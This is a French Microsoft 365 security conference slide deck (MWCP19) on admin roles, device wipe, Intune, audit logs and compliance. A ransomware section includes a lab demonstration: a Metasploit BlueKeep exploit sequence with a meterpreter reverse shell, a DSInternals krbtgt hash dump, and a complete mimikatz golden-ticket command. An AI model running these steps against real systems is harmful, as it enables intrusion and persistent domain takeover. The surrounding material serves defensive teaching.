G
Principaux rôles d’administration
Guillaume Mathieu & @SP_twit #MWCP19S
• Administrateur des données de conformité (eDiscovery)
• Administrateur global
• Administrateur de sécurité
• Administrateur de rôle privilégié
• Administrateur d’utilisateurs
• Administrateur Exchange
• Administrateur SharePoint
• Administrateur Teams
• Administrateur du support technique (réinitialisation de mots de passe)
• Administrateur de facturation
Liste des comptes avec des rôles à forts privilèges
Guillaume Mathieu & @SP_twit #MWCP19S
Liste des comptes avec des rôles à forts privilèges
Guillaume Mathieu & @SP_twit #MWCP19S
PS > #Requires AzureAD or AzureADPreview module
PS > Connect-MsolService
PS > Get-MsolRole | %{ $roleName = $_.Name; Get-MsolRoleMember
-RoleObjectId $_.ObjectId | select DisplayName, EmailAddress, @{Name =
'O365Role'; Expression = {$roleName}}}
Azure AD Privileged Identity Management (PIM)
• Licences Azure AD Premium P2
• Just In Time Access : les administrateurs doivent demander un accès
temporaire aux rôles à fort privilèges.
Guillaume Mathieu & @SP_twit #MWCP19G
Office 365 Privileged Access Management
• Complémentaire avec PIM
• Exchange Online uniquement.
• Permet de bloquer des commandes comme Search-Mailbox pour des
administrateurs de type Organization Management.
Créer des alertes
S Guillaume Mathieu & @SP_twit #MWCP19
Auditer les actions admins Exchange
• EAC > Gestion de conformité > Audit > Exécuter un rapport d’accès
aux BAL par les non propriétaires
S Guillaume Mathieu & @SP_twit #MWCP19
En résumé
• Sans EMS :
• POLP
• Création d’alertes
• Audit des logs
• Avec EMS :
• Mise en œuvre d’Azure AD Privileged Identity Management (PIM)
• Mise en œuvre d’Office 365 Privileged Access Management
Guillaume Mathieu & @SP_twit #MWCP19
126
Incident #6
Perte / vol de terminal
Vol ou perte de terminal
Guillaume Mathieu & @SP_twit #MWCP19G
Elévation de privilèges → administrateur local
G
• Comment devenir
administrateur local
sur une machine
non chiffrée ?
Elévation de privilèges → administrateur du domaine
G
• Comment devenir
administrateur du
domaine quand on
est administrateur
local d’une
machine ?
BitLocker avec sauvegarde des clés dans Azure AD
G
Forcer avec Intune :
https://blog.ctglobalservices.com/windows-client/mas/how-to-manage-bitlocker-on-a-azure-ad-joined-
windows-10-device-managed-by-intune/#post/0
MDM / MAM
• System Center Configuration Manager
(SCCM)
• « vieux »
• Pour Windows
• Part de la suite System Center
• Intégrable dans Intune
• MDM pour O365
• Inclue dans O365 suscriptions
• Compatible iOS, Andoid, Windows
• Security policies (password requirement)
• Remote wipe
S Guillaume Mathieu & @SP_twit #MWCP19
• Microsoft Intune
• MDM complet
• Inclue dans EMS ou à part
• Fait MDM pour O365
• + Mac OS
• + Déploiement d’Apps
• + In App policies (retrict copie
/coller)
ActiveSync pour la suppression des terminaux à
distance par l’admin
• Centre d’administration Exchange Online
• > Destinataire
• > <user>
• > Périphériques mobiles
• > Afficher les détails
• > <device>
• > Effacer les données
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Get-MobileDevice -Mailbox <user> | select Id
PS > Clear-MobileDevice -Identity <device Id> -NotificationEmailAddresses
"admin@contoso.com" # -AccountOnly pour seulement la BAL
ActiveSync pour la suppression des terminaux à
distance par l’utilisateur
• Depuis interface Outlook > Paramètres > Afficher tous
les paramètres d’Outlook
• Général > Appareils mobiles > <appareil> > Effacer
S Guillaume Mathieu & @SP_twit #MWCP19
Préparation d’Intune
• https://portal.azure.com/#blade/Microsoft_Intune_DeviceSettings/E
xtensionLandingBlade/overview
S
Ajout de périphérique manuellement
• L’auto enroll (ajout automatique de périphérique lors de l’ajout du
compte sur la machine –
nécessite Azure AD Premium P1)
• Paramètres
> Accès Professionnel ou Scolaire
> <compte utilisateur>
> S’inscrire uniquement à la gestion
des péripériques
S Guillaume Mathieu & @SP_twit #MWCP19
Suppression de terminal à distance avec Intune
• Portail Azure > Intune > Rechercher un appareil > <appareil> >
Réinitialiser
S
EndPoint Manager
MDM / MAM sur M365
S
MDM
SCCM InTune
Microsoft EndPoint Manager
• Vue consolidée de tous les périphériques
• Score de productivité
• Recommandations de sécurité
• https://devicemanagement.microsoft.com
S Guillaume Mathieu & @SP_twit #MWCP19
Suppression de terminal à distance depuis
EndPoint Manager
• https://devicemanagement.microsoft.com/
S
En résumé
• Sans EMS :
• Suppression des données à distance via MDM
• Bitlocker les disques avec sauvegarde des clés dans Active Directory ou Azure
Active Directory
• Avec EMS :
• Suppression des données à distance via Intune
Guillaume Mathieu & @SP_twit #MWCP19
141
Incident #7
Cryptolocker et
ransomwares
Fonctionnement d’un cryptolocker
• La méthodologie :
• Une faille applicative pour devenir administrateur local (comme BlueKeep)
• Elévation des privilèges pour se propager sur des machines seines avec un
outil comme Mimikatz.
• Chiffrement des données.
• Génération d’un Golden Ticket pour revenir si besoin avec DSINternals et
Mimikatz.
G Guillaume Mathieu & @SP_twit #MWCP19
Metasploit : exploitation de la faille Bluekeep
G Guillaume Mathieu & @SP_twit #MWCP19
• Téléchargement de Metasploit :
• Gratuit pour la version communauté :
• https://github.com/rapid7/metasploit-
framework/wiki/Nightly-Installers
• La procédure avec Metasploit :
• https://headleaks.com/2019/11/11/how-hackers-exploit-
bluekeep-vulnerability-to-install-cryptominer-on-windows-
servers-YWEvR1Z3eCtWS0ZpZllxc2ZzUDdyQT09
• Procédures d’attaque :
Désactiver Windows Defender (via GPEDIT).
Lancer l’outil C:metasploit-
frameworkbinmsfconsole.bat
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.140.129
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.140.127
set LPORT 4444
show targets
set target 6
exploit
Metasploit : exploitation de la faille Bluekeep
G Guillaume Mathieu & @SP_twit #MWCP19
L’exploit actuel est en cours
d’amélioration.
A venir → un invite de
commande en tant que
System.
Mimikatz : élévation de privilèges
G Guillaume Mathieu & @SP_twit #MWCP19
Générer un Golden Ticket - DSInternals
• Module PowerShell DSInternals :
• https://www.powershellgallery.com/packa
ges/DSInternals/2.16.1
• https://www.dsinternals.com/en/list-of-
cmdlets-in-the-dsinternals-module/
• Utilisation « standard » du protocole MS-
DRSR (Directory Replication Service (DRS)
Remote)
• Permet de lire / modifier le LMHASH et le
NTHASH d’un compte.
• Installation simplifiée (PowerShell V5) :
Install-Module DSInternals
G Guillaume Mathieu & @SP_twit #MWCP19
Générer un Golden Ticket - DSINternals
• Avec DSInternals - domaine : idday.intra - contrôleur de domaine : iddaydc1.idday.intra
Taper la commande suivante : Get-ADReplAccount -SamAccountName krbtgt -Domain idday
-Server IDDAYDC1.idday.intra
G Guillaume Mathieu & @SP_twit #MWCP19
Générer un Golden Ticket - Mimikatz
mimikatz.exe "privilege::debug" "kerberos::golden
/admin:administrator /domain:idday.intra /id:4000 /sid:S-1-5-21-
3891616466-275351861-3864161629
/krbtgt:118df50a41bca303945583ad11245fce /startoffset:0
/endin:600 /renewmax:10080 /ptt"
G Guillaume Mathieu & @SP_twit #MWCP19
Sécuriser son annuaire Active Directory
G
• Mise en oeuvre
d’Azure ATP pour
détecter les
attaques.
Bloquer les machine non sûres avec Intune
• Créer une stratégie Intune
https://devicemanagement.microsoft.com/
• Sécurité du point de terminaison > Conformité de l’appareil >
Stratégie > Créer une stratégie
Guillaume Mathieu & @SP_twit #MWCP19S
Restauration des documents OneDrive,
SharePoint et Teams
S
Protection contre les cryptolocker
• https://support.office.com/fr-fr/article/sauvegarder-vos-documents-images-et-
dossiers-de-bureau-avec-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057
G
Architecte sans AD / serveur de fichiers / WSUS
• Pour les sociétés < 50 personnes :
• Azure AD comme annuaire d’entreprise et annuaire applicatif
• Intune comme alternative aux stratégies de groupe :
https://oliverkieselbach.com/2019/07/18/intune-policy-processing-on-windows-
10-explained/
• SharePoint Online / OneDrive for Business comme alternative aux serveurs de
fichiers - SharePoint Migration tools : https://docs.microsoft.com/en-
us/sharepointmigration/fileshare-to-odsp-migration-guide
• Windows Update for Business / Delivery Optimization comme alternative à WSUS
• Autopilot comme alternative aux outils de déploiement / master
• TeamViewer comme outil de prise en main à distance avec interface Intune :
https://www.teamviewer.com/fr/integrations/microsoft-intune
G Guillaume Mathieu & @SP_twit #MWCP19
Architecte sans AD / serveur de fichiers / WSUS
G Guillaume Mathieu & @SP_twit #MWCP19
2 portail d’administration pour Intune :
Via le portail Azure AD (Devices et Intune) : https://portal.azure.com
Le portail Microsoft Endpoint Manager admin center : https://devicemanagement.microsoft.com/#home
En résumé
• Sans EMS :
• Sécurisation de son annuaire Active Directory
• Outils tiers de détection d’attaque comme Alsid for AD (payant).
• Avec EMS :
• Azure ATP / ATA (équivalent On-Premise).
• Intune pour forcer les machines à être conforme
• Pour les sociétés < 50 personnes : Azure AD Join + Intune + Office 365 (plus
d’AD et de serveurs de fichiers).
Guillaume Mathieu & @SP_twit #MWCP19
156
Incident #8
Suivi et anticipation
Export des logs Exchange Online
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -LogonTypes
Owner -StartDate 1/1/2019 -EndDate 1/1/2020 -ResultSize 2000 –ShowDetails
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -StartDate
$([datetime]::Now.AddDays(-90) -EndDate $([datetime]::Now) –ShowDetails -
ResultSize 2000 | Export-Csv –NoTypeInformation –Path
".MonExportMailBox$(Get-Date -Format 'yyyyMMddhhmmss').csv"
Export des logs O365
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Export Excel limité à 50K events, 3K chars
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > $beginDate = [datetime]::Now.AddDays(-90)
PS > $endDate = [datetime]::Now
PS > $sessionId = "FullExport$(Get-Date -Format 'yyyyMMddhhmmss')”
PS > Do {
$tempResult = Search-UnifiedAuditLog -StartDate $beginDate -EndDate $endDate
-ResultSize 1000 -SessionId $sessionId -SessionCommand ReturnLargeSet
$resultSet += $tempResult
} Until ($tempResult.Count -eq 0)
PS > | Export-Csv –NoTypeInformation –Path ".MonExportMailBox$(Get-Date -
Format 'yyyyMMddhhmmss').csv"
La sauvegarde des données
• Stratégie de sauvegarde : réplication de la données sur plusieurs
centre de données + rétention des données supprimées.
• Sauvegarde Microsoft : 2 fois par jour avec rétention 14 jours (sans
garantie Microsoft).
• Pour retrouver des données supprimer à plus de 14 jours :
Utiliser un outil tiers comme Veeam Backup For Office 365.
S Guillaume Mathieu & @SP_twit #MWCP19
Se tester avec le Secure Score
• https://security.microsoft.com/securescore
S Guillaume Mathieu & @SP_twit #MWCP19
En résumé
• Sans EMS :
• Export et sauvegarde des logs
• Sauvegarder votre tenant Office 365 avec un outil tiers.
• Evalualer son niveau de sécurité avec le secure score
Guillaume Mathieu & @SP_twit #MWCP19
162
Et Microsoft?
S Guillaume Mathieu & @SP_twit #MWCP19
Customer LockBox
• Nécessite licence O365 E5
• Validation de toute action du support
Microsoft aux données Exchange /
SharePoint et OneDrive
• Accès de 12h par défaut
• Tenant admin > Settings >
Security and Privacy>
Customer LockBox
S Guillaume Mathieu & @SP_twit #MWCP19
Localisation
• Multi geo capability
(500 users min.
2$/users/mmois)
• Data center FR
S Guillaume Mathieu & @SP_twit #MWCP19
Où sont les miennes
• Tenant administration > Paramètres > Profil de l’organisation
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-MsolService
PS > (Get-MsolCompanyInformation).AuthorizedServiceInstances
Où sont les miennes?
S Guillaume Mathieu & @SP_twit #MWCP19
Chiffrement des communications
• Communications internes O365 : TLS ou IPSec
• Communication O365/client : TLS (SHA 256, clé publique 2048 bits)
S Guillaume Mathieu & @SP_twit #MWCP19
Chiffrement au stockage
• 1 ou plusieurs Blobs dans plusieurs Azure Storage (max 64Ko)
• Une clef de chiffrement par fichier (AES 256bits)
• Clefs stockées chiffrées dans la base de données SharePoint qui contient aussi la
carte pour retrouver les Blobs
• Clef de déchiffrement des containers
Azure storage et des clefs dans la base de
données SharePoint dans le Key Store
(ou Azure Key Vault si BYOK)
• Conformité du chiffrement avec FIPS 140-2
• SharePoint DB dans Azure SQL Database elle-même chiffrée par Transparent
Data Encryption
• Disques durs chiffrés par BitLocker
S Guillaume Mathieu & @SP_twit #MWCP19
Normes
• Nombreuses normes
• Habilitation Hébergeur
de données de santé FR
• Audit extérieurs
• Accès aux documents
d’audit
S Guillaume Mathieu & @SP_twit #MWCP19
Accès aux documents d’audit externes
• https://servicetrust.microsoft.com/
• White papers
• Rapports pen test
• Audits
S Guillaume Mathieu & @SP_twit #MWCP19
RGPD
• Contrat compatible
• Nombreuses fonctionnalités pour
conformité (eDiscovery, RMS,
Etiquettes, DLP, etc.)
S Guillaume Mathieu & @SP_twit #MWCP19
Télémétrie
• Envoie de données de télémétrie à Microsoft (Office Pro Plus est un
« third party tool » dans les conditions générales de vente)
• Auditable via la Visionneuse de
Données de Diagnostic
• Mise à jour des conditions de ventes
Q1 2020
S Guillaume Mathieu & @SP_twit #MWCP19
Patriot Act / SCA
• S’applique uniquement aux données
stockées ou transitant sur sol US
• Patriot Act -> FBI, CIA, NSA, Armée
• SCA -> Justice
• Microsoft a tenu tête des années au DoJ
sur l’extra territorialité du SCA (Stored
Communication Act) jusqu’à la cours
Suprême des USA (cf. Cloud Act plus tard)
S Guillaume Mathieu & @SP_twit #MWCP19
Cloud Act
• Sur requête d’un procureur américain (ex:
corruption, commerce avec pays sous embargo)
• Applicabilité extra territoriale
• Si accord bilatéral, opposition de l’hébergeur sous
14 jours possible si :
• Citoyen non américain
• ET va à l’encontre de la législation locale
Conditions générales de vente O365
“Si Microsoft est contrainte de divulguer des Données Client ou des Données à Caractère Personnel aux
pouvoirs publics, elle s’engage à en aviser le Client dans les meilleurs délais et à fournir un exemplaire de
la demande, sauf interdiction légale.”
Guillaume Mathieu & @SP_twit #MWCP19S
176
Et si j’ai juste 5
minutes?
Sécurité si vous démarrez de zero un tenant
Guillaume Mathieu & @SP_twit #MWCP19S
• Admin MFA
• Users MFA
• Désactivation des
protocole legacy
• MFA pour actions à
privilège
• C’est le futur des
paramètres par
défaut Microsoft
sous 5 ans
Buy some remote consulting!
Acheter des journées de conseil à distance !
https://modern-workplace.pro/mwcp-sebastien-paulet
Meetup gratuit Mardi soir (sur inscription)
Get sessions slide deck
and information from sponsors
Or click the link
MWCP 2019 - Thanks to our
Sponsors!

Contenu connexe

Tendances

Securely Harden Microsoft 365 with Secure Score
Securely Harden Microsoft 365 with Secure ScoreSecurely Harden Microsoft 365 with Secure Score
Securely Harden Microsoft 365 with Secure ScoreJoel Oleson
 
Azure Sentinel Jan 2021 overview deck
Azure Sentinel Jan 2021 overview deck Azure Sentinel Jan 2021 overview deck
Azure Sentinel Jan 2021 overview deck Matt Soseman
 
Microsoft 365 eEnterprise E5 Overview
Microsoft 365 eEnterprise E5 OverviewMicrosoft 365 eEnterprise E5 Overview
Microsoft 365 eEnterprise E5 OverviewDavid J Rosenthal
 
Working with MS Endpoint Manager
Working with MS Endpoint ManagerWorking with MS Endpoint Manager
Working with MS Endpoint ManagerGeorge Grammatikos
 
Introduction to Microsoft Enterprise Mobility + Security
Introduction to Microsoft Enterprise Mobility + SecurityIntroduction to Microsoft Enterprise Mobility + Security
Introduction to Microsoft Enterprise Mobility + SecurityAntonioMaio2
 
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORKCYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORKMaganathin Veeraragaloo
 
Modernize your Security Operations with Azure Sentinel
Modernize your Security Operations with Azure SentinelModernize your Security Operations with Azure Sentinel
Modernize your Security Operations with Azure SentinelCheah Eng Soon
 
Machine Learning and AI
Machine Learning and AIMachine Learning and AI
Machine Learning and AIJames Serra
 
Microsoft 365 Compliance and Security Overview
Microsoft 365 Compliance and Security OverviewMicrosoft 365 Compliance and Security Overview
Microsoft 365 Compliance and Security OverviewDavid J Rosenthal
 
Privileged identity management
Privileged identity managementPrivileged identity management
Privileged identity managementNis
 
Microsoft 365 Security and Compliance
Microsoft 365 Security and ComplianceMicrosoft 365 Security and Compliance
Microsoft 365 Security and ComplianceDavid J Rosenthal
 
Pitching Microsoft 365
Pitching Microsoft 365Pitching Microsoft 365
Pitching Microsoft 365Robert Crane
 
cyber-security-reference-architecture
cyber-security-reference-architecturecyber-security-reference-architecture
cyber-security-reference-architectureBirendra Negi ☁️
 
Primer for IT Opportunities with the Convergence of IT & OT
Primer for IT Opportunities with the Convergence of IT & OT Primer for IT Opportunities with the Convergence of IT & OT
Primer for IT Opportunities with the Convergence of IT & OT kscgreatdane
 
All Plans Comparison - Office 365 and Microsoft 365 Plans
All Plans Comparison - Office 365 and Microsoft 365 PlansAll Plans Comparison - Office 365 and Microsoft 365 Plans
All Plans Comparison - Office 365 and Microsoft 365 PlansGetMax DMCC
 
Azure Information Protection
Azure Information ProtectionAzure Information Protection
Azure Information ProtectionRobert Crane
 

Tendances (20)

Securely Harden Microsoft 365 with Secure Score
Securely Harden Microsoft 365 with Secure ScoreSecurely Harden Microsoft 365 with Secure Score
Securely Harden Microsoft 365 with Secure Score
 
Azure Sentinel Jan 2021 overview deck
Azure Sentinel Jan 2021 overview deck Azure Sentinel Jan 2021 overview deck
Azure Sentinel Jan 2021 overview deck
 
Microsoft 365 eEnterprise E5 Overview
Microsoft 365 eEnterprise E5 OverviewMicrosoft 365 eEnterprise E5 Overview
Microsoft 365 eEnterprise E5 Overview
 
Working with MS Endpoint Manager
Working with MS Endpoint ManagerWorking with MS Endpoint Manager
Working with MS Endpoint Manager
 
Introduction to Microsoft Enterprise Mobility + Security
Introduction to Microsoft Enterprise Mobility + SecurityIntroduction to Microsoft Enterprise Mobility + Security
Introduction to Microsoft Enterprise Mobility + Security
 
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORKCYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK
 
Azure sentinel
Azure sentinelAzure sentinel
Azure sentinel
 
Modernize your Security Operations with Azure Sentinel
Modernize your Security Operations with Azure SentinelModernize your Security Operations with Azure Sentinel
Modernize your Security Operations with Azure Sentinel
 
Machine Learning and AI
Machine Learning and AIMachine Learning and AI
Machine Learning and AI
 
Office 365: Do’s and Don’ts, Lessons learned from the field
Office 365: Do’s and Don’ts, Lessons learned from the fieldOffice 365: Do’s and Don’ts, Lessons learned from the field
Office 365: Do’s and Don’ts, Lessons learned from the field
 
Azure Sentinel.pptx
Azure Sentinel.pptxAzure Sentinel.pptx
Azure Sentinel.pptx
 
Microsoft 365 Compliance and Security Overview
Microsoft 365 Compliance and Security OverviewMicrosoft 365 Compliance and Security Overview
Microsoft 365 Compliance and Security Overview
 
Privileged identity management
Privileged identity managementPrivileged identity management
Privileged identity management
 
Microsoft 365 Security and Compliance
Microsoft 365 Security and ComplianceMicrosoft 365 Security and Compliance
Microsoft 365 Security and Compliance
 
Pitching Microsoft 365
Pitching Microsoft 365Pitching Microsoft 365
Pitching Microsoft 365
 
cyber-security-reference-architecture
cyber-security-reference-architecturecyber-security-reference-architecture
cyber-security-reference-architecture
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:
 
Primer for IT Opportunities with the Convergence of IT & OT
Primer for IT Opportunities with the Convergence of IT & OT Primer for IT Opportunities with the Convergence of IT & OT
Primer for IT Opportunities with the Convergence of IT & OT
 
All Plans Comparison - Office 365 and Microsoft 365 Plans
All Plans Comparison - Office 365 and Microsoft 365 PlansAll Plans Comparison - Office 365 and Microsoft 365 Plans
All Plans Comparison - Office 365 and Microsoft 365 Plans
 
Azure Information Protection
Azure Information ProtectionAzure Information Protection
Azure Information Protection
 

Similaire à MWCP19 Cybersécurité et M365 en action

aMS Strasbourg Cybersec et M365 en action 14102021
aMS Strasbourg Cybersec et M365 en action 14102021aMS Strasbourg Cybersec et M365 en action 14102021
aMS Strasbourg Cybersec et M365 en action 14102021Sébastien Paulet
 
aMS Strasbourg CyberSec et M365 en action
aMS Strasbourg CyberSec et M365 en actionaMS Strasbourg CyberSec et M365 en action
aMS Strasbourg CyberSec et M365 en actionClément SERAFIN
 
[GAB2016] La gestion des identités avec Azure - Maxime Rastello
[GAB2016] La gestion des identités avec Azure - Maxime Rastello [GAB2016] La gestion des identités avec Azure - Maxime Rastello
[GAB2016] La gestion des identités avec Azure - Maxime Rastello Cellenza
 
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...AZUG FR
 
Collab 365 - [FRENCH] Pièges dans les nuages
Collab 365 - [FRENCH] Pièges dans les nuagesCollab 365 - [FRENCH] Pièges dans les nuages
Collab 365 - [FRENCH] Pièges dans les nuagesPatrick Guimonet
 
Piège dans les Nuages - Version Rebuild 2015 Nantes
Piège dans les Nuages - Version Rebuild 2015 NantesPiège dans les Nuages - Version Rebuild 2015 Nantes
Piège dans les Nuages - Version Rebuild 2015 NantesPatrick Guimonet
 
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]Comment securiser votre usage ou migration vers Office 365 [2018 12-04]
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]Sylvain Cortes
 
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...☁️Seyfallah Tagrerout☁ [MVP]
 
Windows Azure Camp du mardi 10 décembre 2013
Windows Azure Camp du mardi 10 décembre 2013Windows Azure Camp du mardi 10 décembre 2013
Windows Azure Camp du mardi 10 décembre 2013Microsoft Technet France
 
Quoi de neuf pour les identités dans Office 365 ?
Quoi de neuf pour les identités dans Office 365 ?Quoi de neuf pour les identités dans Office 365 ?
Quoi de neuf pour les identités dans Office 365 ?Philippe Beraud
 
Webinar bonnes pratiques securite
Webinar   bonnes pratiques securiteWebinar   bonnes pratiques securite
Webinar bonnes pratiques securitejumeletArnaud
 
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et Monaco
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et MonacoCycle de vie d'un projet web agile avec TFS 2013, Azure VM et Monaco
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et MonacoMicrosoft
 
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Philippe Beraud
 
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Microsoft Décideurs IT
 
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Microsoft Technet France
 
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Microsoft Technet France
 
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...Microsoft Technet France
 
Powershell Saturday - Azure at Scale with PowerShell
Powershell Saturday - Azure at Scale with PowerShellPowershell Saturday - Azure at Scale with PowerShell
Powershell Saturday - Azure at Scale with PowerShellBenoît SAUTIERE
 
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...aOS Community
 

Similaire à MWCP19 Cybersécurité et M365 en action (20)

aMS Strasbourg Cybersec et M365 en action 14102021
aMS Strasbourg Cybersec et M365 en action 14102021aMS Strasbourg Cybersec et M365 en action 14102021
aMS Strasbourg Cybersec et M365 en action 14102021
 
aMS Strasbourg CyberSec et M365 en action
aMS Strasbourg CyberSec et M365 en actionaMS Strasbourg CyberSec et M365 en action
aMS Strasbourg CyberSec et M365 en action
 
[GAB2016] La gestion des identités avec Azure - Maxime Rastello
[GAB2016] La gestion des identités avec Azure - Maxime Rastello [GAB2016] La gestion des identités avec Azure - Maxime Rastello
[GAB2016] La gestion des identités avec Azure - Maxime Rastello
 
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...
 
Collab 365 - [FRENCH] Pièges dans les nuages
Collab 365 - [FRENCH] Pièges dans les nuagesCollab 365 - [FRENCH] Pièges dans les nuages
Collab 365 - [FRENCH] Pièges dans les nuages
 
Piège dans les Nuages - Version Rebuild 2015 Nantes
Piège dans les Nuages - Version Rebuild 2015 NantesPiège dans les Nuages - Version Rebuild 2015 Nantes
Piège dans les Nuages - Version Rebuild 2015 Nantes
 
Retour d'expérience sur PowerShell
Retour d'expérience sur PowerShellRetour d'expérience sur PowerShell
Retour d'expérience sur PowerShell
 
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]Comment securiser votre usage ou migration vers Office 365 [2018 12-04]
Comment securiser votre usage ou migration vers Office 365 [2018 12-04]
 
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...
Comment sécuriser son environnement Microsoft 365 avec Microsft Threat Protec...
 
Windows Azure Camp du mardi 10 décembre 2013
Windows Azure Camp du mardi 10 décembre 2013Windows Azure Camp du mardi 10 décembre 2013
Windows Azure Camp du mardi 10 décembre 2013
 
Quoi de neuf pour les identités dans Office 365 ?
Quoi de neuf pour les identités dans Office 365 ?Quoi de neuf pour les identités dans Office 365 ?
Quoi de neuf pour les identités dans Office 365 ?
 
Webinar bonnes pratiques securite
Webinar   bonnes pratiques securiteWebinar   bonnes pratiques securite
Webinar bonnes pratiques securite
 
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et Monaco
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et MonacoCycle de vie d'un projet web agile avec TFS 2013, Azure VM et Monaco
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et Monaco
 
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
 
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
 
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...
 
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...
 
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...
 
Powershell Saturday - Azure at Scale with PowerShell
Powershell Saturday - Azure at Scale with PowerShellPowershell Saturday - Azure at Scale with PowerShell
Powershell Saturday - Azure at Scale with PowerShell
 
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...
2019-06-12 aOS Aix Marseille - B4 - Gestion des comptes à privilèges - Jean-P...
 

Plus de Sébastien Paulet

aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...
